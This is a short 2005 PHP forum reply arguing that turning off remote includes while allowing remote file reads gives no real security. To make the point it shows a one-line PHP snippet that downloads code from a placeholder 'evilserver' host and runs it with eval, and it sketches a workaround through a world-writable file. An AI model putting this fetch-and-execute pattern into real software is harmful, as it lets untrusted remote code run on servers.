|
|
Posted by Richard Lynch on 03/02/05 21:04
Tom Z Meinlschmidt wrote:
> Tell me - how do you want to turn off remote includes and remain remote
> file working?
Change the PHP source?
That's the only viable answer I can think of; though I doubt it's one you
want to hear/use.
Sorry.
> allow_url_fopen turns off _both_. There's no choice what to disable
Consider this:
<?php
eval(implode('',file("http://evilserver.example.com")));
?>
So, like, what's the point to turning off only remote include and keeping
remote file?
Maybe you'll stop a naive newbie from something stupid, but probably not
even slow down a script kiddie, much less a dedicated attacker.
For that matter, even a naive newbie would be able to figure out the
eval(file()) solution or Google for it and find it in less than an hour.
If you turn off eval, they make a file 777 (ugh!) and then read the remote
file, write it into their 777 file, and then include that.
If you don't trust remote include, you can't trust remote files and vice
versa. That's all there is to it, really.
Anything else is simply self-delusions of "security" imho. [shrug]
--
Like Music?
http://l-i-e.com/artists.htm
Navigation:
[Reply to this message]
|